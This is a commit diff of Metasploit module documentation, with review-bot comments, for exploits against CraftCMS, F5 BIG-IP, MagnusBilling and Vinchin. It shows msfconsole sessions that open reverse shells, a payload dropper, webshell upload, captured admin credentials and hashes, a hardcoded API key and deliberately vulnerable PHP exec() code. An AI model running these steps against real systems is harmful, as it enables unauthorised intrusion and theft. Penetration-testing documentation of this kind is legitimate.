Merge branch 'master' into docker-kernel-module-escape

This commit is contained in:
RadioLogic
2024-03-04 22:58:18 -05:00
235 changed files with 33723 additions and 5573 deletions
@@ -0,0 +1,231 @@
## Vulnerable Application
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system.
CraftCMS versions between `4.0.0-RC1` - `4.4.14` are affected by this vulnerability allowing attackers to execute arbitrary code remotely,
potentially compromising the security and integrity of the application.
The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary
PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.
Using this vulnerability in combination with `The Imagick Extension` and `MSL` which stands for `Magick Scripting Language`,
a full RCE can be achieved. `MSL` is a built-in `ImageMagick` language that facilitates the reading of images, performance of
image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious
PHP code using the `Imagick` constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious
PHP code and gaining access to the system.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating
system as the user that the web services are running as (typically `www-data`).
## Installation
To test this module, you will need a vulnerable CraftCMS application.
This module has been tested on:
- [ ] `CraftCMS 4.4.14` running on MacOS Docker Desktop based on a `DDEV` deployment.
### Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV
* Install [Docker Desktop](https://ddev.readthedocs.io/en/stable/users/install/docker-installation/#macos) on your MacOS distribution.
* Install [DDEV](https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/).
* Install CraftCMS following these [installation steps](https://craftcms.com/docs/getting-started-tutorial/install/).
* NOTE: After step 2 `Scaffold the project from the official starter project`, open composer.json to edit the CraftCMS version and
* set it to `4.4.14` or lower.
* Run `composer update` to downgrade the `CraftCMS` version to a vulnerable version.
* See also these [instructions](https://craftcms.com/knowledge-base/downloading-previous-craft-versions).
* Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)
* To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine.
* You can follow these [instructions](https://stackoverflow.com/questions/53371087/access-ddev-web-container-from-other-hosts).
You are now ready to test the module.
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892`
- [x] `set rhosts <ip-target>`
- [x] `set rport 443`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=php, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`
you should get a `shell` or `Meterpreter`
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info
Name: Craft CMS unauthenticated Remote Code Execution (RCE)
Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
Platform: Unix, Linux, PHP
Arch: cmd, php, x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2023-09-13
Provided by:
chybeta
h00die-gr3y <h00die.gr3y@gmail.com>
Module side effects:
artifacts-on-disk
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 PHP
1 Unix Command
2 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Craft CMS base url
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
WEBSHELL no The name of the webshell with extension .php. Webshell name will be randomly generated if left unset
.
When TARGET is not 0:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec)
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.
0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload information:
Description:
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability
allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
of the application.
The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
which allows to run arbitary PHP code by escalating the object creation calling some methods available in
`\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
facilitates the reading of images, performance of image processing tasks, and writing of results back
to the filesystem. This can be leveraged to create a dummy image containing mailcious PHP code using the
Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
malicious PHP code and gaining access to the system.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
access to the underlying operating system as the user that the web services are running as (typically www-data).
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-41892
https://blog.calif.io/p/craftcms-rce
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
https://github.com/advisories/GHSA-4w8r-3xrw-v25g
https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892
View the full module info with the info -d command.
```
## Options
### WEBSHELL
You can use this option to set the filename of the webshell with extension `.php`, otherwise the name will be randomly generated.
### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
## Scenarios
### CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
[+] Deleted /tmp/php5M63PK
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000
meterpreter > sysinfo
Computer : craftcms-vuln-web
OS : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/XGCuZFdoia.php
[+] Deleted /tmp/phpakTlmu
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000
uname -a
Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
id
uid=501(www-data) gid=20(dialout) groups=20(dialout)```
### CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
[*] Sending payload to 192.168.201.25 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/sFQEhvKKcl.php
[+] Deleted /tmp/phpeQPKpy
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.16.2
OS : Debian 11.8 (Linux 6.4.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
## Limitations
Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory
set by the `upload_tmp_dir` setting in the `php.ini` file (default `/tmp`). These files are automatically cleaned, but in case of
any failure cleaning these files, do clean them manually otherwise the next exploit session will fail using an outdated MSL file.
These files start with `php` and you can list them with the command `ls php*`.
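Review bot: The closing fence of the Unix Command scenario is glued to the last output line (`uid=501(www-data) gid=20(dialout) groups=20(dialout)```), which will swallow the following heading and the Linux Dropper block when rendered; put the ``` on its own line. Further points in this hunk: the "tested on" entry uses an unchecked box (`- [ ]`) while the verification steps use `- [x]`, so the only test platform reads as untested; the NOTE in the installation steps is split across two bullets ("...edit the CraftCMS version and" / "* set it to `4.4.14` or lower."); and the module description carries "arbitary" and "mailcious" (L105/L109 of the pasted `info` output), which means the same typos live in the module's own `Description` metadata and should be fixed there, not only in this doc. Since the Limitations section says stale MSL files under `upload_tmp_dir` make the next run fail, it would help to say which host the `ls php*` cleanup is meant for (the target, in the directory `php.ini` points at) rather than leaving that implicit.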
@@ -52,11 +52,11 @@ Defaults to `/tmp`.
### F5 BIG-IP 14.1.2 in VMware Fusion
```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce):
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):
Name Current Setting Required Description
---- --------------- -------- -----------
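Review bot: The rename from `exploit/linux/http/f5_bigip_tmui_rce` to `exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902` is applied consistently to the `use` line, the `options` prompt and the "Module options (...)" header in this hunk. What the hunk cannot show is whether the documentation file itself and any other mention of the old path outside these lines were renamed along with the module; a grep for `f5_bigip_tmui_rce)` before merging would confirm that. Minor: this fence carries no language tag, whereas the new docs in this commit use ```shell.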
@@ -87,11 +87,11 @@ Exploit target:
1 Linux Dropper
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
rhosts => 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
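Review bot: The `set rhosts`, `set lhost` and `run` prompts get the same rename; the `rhosts =>` / `lhost =>` echo lines and the handler and AutoCheck output below them are correctly left untouched since they do not carry the module name. Worth confirming outside this hunk: if the module does not register the old path as an alias, anyone with `use exploit/linux/http/f5_bigip_tmui_rce` in a saved resource script will no longer find it, and a one-line note at the top of the doc mentioning the previous name would save that confusion.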
@@ -0,0 +1,77 @@
## Vulnerable Application
### Description
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
created.
Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.
### Setup
Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.
The target does not need to be licensed to be vulnerable.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.
## Targets
### Command
This executes an OS command on the target device.
## Options
## Scenarios
### F5 BIG-IP 17.0.0.1-0.0.4
```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : f5test2.home.lan
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========
host origin service public private realm private_type JtR Format cracked_password
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) >
```
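Review bot: Verification step 4 says to set `RHOST`, but the option is `RHOSTS` (the scenario itself uses `set RHOSTS 192.168.159.32`). The description states that both `exploit` and `check` delete the temporary administrative account they create, yet the scenario output shows the account being created ("Admin user was created successfully. Credentials: UyPzjB - ...") and never shows it being removed; including the cleanup line in the transcript would let a reader verify the claim, which matters because a leftover admin account on a BIG-IP is exactly the artifact a blue team would hunt for after a test. Also: the `## Options` section is empty (either list the module-specific options or drop the heading), the Setup only names the 17.0.0.1-0.0.4 OVA although the text says 16.1.2.1-0.0.10 was tested as well, and the fence has no language tag.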
@@ -0,0 +1,241 @@
## Vulnerable Application
`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, aimed at IP telephony providers.
It provides a complete and powerful system for anyone to start an IP telephony provider.
Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7.
The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753.
The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
An unauthenticated user is able to execute arbitrary OS commands.
The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
At a minimum, this allows an attacker to compromise the billing system and its database.
See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
## Installation
This module has been tested on:
- Debian 12.2 running on VirtualBox 7 with MagnusBilling 7 installed.
- CentOS 7 running on VirtualBox 7 with MagnusBilling 6 installed.
### Installation steps
* Install Debian 11 or later on VirtualBox.
* Follow these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
* Login into Debian Linux machine.
* Switch to root with `su -` if needed.
* Follow the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
* After successful installation, you can test the module with the verification steps listed at the **Verification** section.
PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root,
typically `/var/www/html`, by adding the vulnerable code below.
```php
if (isset($_GET['demo'])) {
if ($_GET['demo'] == 1) {
exec("touch idepay_proccess.php");
} else {
exec("rm -rf idepay_proccess.php");
}
}
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
```
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
- [x] `set rhosts <ip-target>`
- [x] `set rport <port>`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`
you should get a `shell` or `Meterpreter` session.
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
Name: MagnusBilling application unauthenticated Remote Command Execution.
Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
Platform: PHP, Unix, Linux
Arch: php, cmd, x64, x86
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2023-06-26
Provided by:
h00die-gr3y <h00die.gr3y@gmail.com>
Eldstal
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 PHP
1 Unix Command
2 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
chine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left
unset.
Payload information:
Description:
A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
remote attackers to run arbitrary commands via unauthenticated HTTP request.
A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
not properly sanitised/escaped.
After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
The commands run with the privileges of the web server process, typically `www-data`.
At a minimum, this allows an attacker to compromise the billing system and its database.
The following MagnusBilling applications are vulnerable:
- MagnusBilling application version 6 (all versions);
- MagnusBilling application up to version 7.x and including commit 7af21ed620;
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-30258
https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
https://eldstal.se/advisories/230327-magnusbilling.html
View the full module info with the info -d command.
```
## Options
### TARGETURI
The uripath to the `MagnusBilling` web application. Default set is to `/mbilling`.
### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.
## Scenarios
### MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted LfsCVIttNL.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000
meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer : debian
OS : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
Meterpreter : php/linux
meterpreter >
```
### MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
target => 1
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 2.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000
uname -a
Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
pwd
/var/www/html/mbilling/lib/icepay
```
### MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
target => 2
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.09 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.34
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.34
OS : Debian 12.2 (Linux 6.1.0-13-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: asterisk
meterpreter > pwd
/var/www/html/mbilling/lib/icepay
meterpreter >
```
## Limitations
No limitations identified.
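Review bot: `Privileged: Yes` in the `info` output contradicts the description, which says the injected commands run with the web server's privileges (`www-data` or `asterisk`), and both scenarios confirm `Server username: asterisk`; set `'Privileged' => false` in the module so the metadata and this doc agree. Other points in this hunk: the WEBSHELL option text breaks mid-sentence ("...with different file names." followed by "to bypass any security settings on the Web and PHP server."), the installation steps say "Install Debian 11 or later" while the tested-on list names Debian 12.2, "Login into" should be "Log in to", and `JAVASCRIPT` is normally written `JavaScript`. The "PS:" note deserves more weight than a postscript: on a current MagnusBilling 7 checkout the `democ` block has to be re-added by hand, so the tester is exercising code that upstream has already removed after commit 7af21ed620, and the doc should say that plainly next to the "Vulnerable Application" claim.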
@@ -0,0 +1,170 @@
## Vulnerable Application
This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x, 6.0.x, 6.7.x, and 7.0.x. To prepare the environment:
1. Download Vinchin Backup & Recovery version 5.0.x, 6.0.x, 6.7.x, or 7.0.x.
2. Install the software on a Linux-based server using the downloaded ISO.
3. During the installation, ensure that the network interface is active and configured.
4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
## Verification Steps
1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.x, 6.0.x, 6.7.x, or 7.0.x).
2. Start msfconsole in your Metasploit environment.
3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
4. Set the RHOSTS to the target IP address or hostname.
5. Do: `run`
6. If the target is vulnerable, the exploit will execute the specified payload or command.
## Options
Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
#### RHOSTS
- **Description**: Specifies the target address or range of addresses.
- **Default Value**: None. It must be set by the user.
#### RPORT
- **Description**: The port on which the Vinchin Backup & Recovery service is running.
- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
#### SSL
- **Description**: Specifies whether to use SSL for the connection.
- **Default Value**: True, as Vinchin typically runs over HTTPS.
#### TARGETURI
- **Description**: The base path to the Vinchin Backup & Recovery application.
- **Default Value**: `/`
#### APIKEY
- **Description**: The hardcoded API key required to authenticate to the API.
- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
## Scenarios
### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
This scenario demonstrates exploiting the Vinchin Backup & Recovery version 7.0.1.26282 on a Linux server.
**Environment**:
- Vinchin Backup & Recovery 7.0.1.26282
- Linux Server
- Metasploit Framework
**Steps**:
1. Start `msfconsole`.
2. Load the exploit module:
```
use exploit/linux/http/vinchin_backup_recovery_cmd_inject
```
4. Set the required options:
```
set RHOSTS [target IP]
set APIKEY [API Key]
```
5. Optionally set a payload and configure LHOST and LPORT.
6. Execute the exploit:
```
exploit
```
**Expected Output**:
```
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY 6e24cc40bfdb6963c04a4f1983c8 yes The hardcoded API key
af71
Proxies no A proxy chain of format type:host:port[,type:host:
port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.co
m/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is rando
mly generated)
TARGETURI / yes The base path to the Vinchin Backup & Recovery app
lication
URIPATH no The URI to use for this exploit (default is random
)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FT
P, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME JSSwiKfcOw no Name to use on remote system when storing pa
yload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /usr/share/nginx/vinchin/ yes Remote writable dir to store payload; cannot
tmp contain spaces.
LHOST 192.168.1.5 yes The listen address (an interface may be spec
ified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
rhosts => 192.168.1.3
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
[*] Detected Vinchin version: 7.0.1.26282
[+] 192.168.1.3:443 - The target is vulnerable.
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Vinchin version: 7.0.1.26282
[+] The target is vulnerable.
[*] Sending stage (3045380 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:58960) at 2023-11-21 02:00:57 +0100
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
Note: All instances of this exploit can be subject to privilege escalation using the
`exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module in the Metasploit environment.
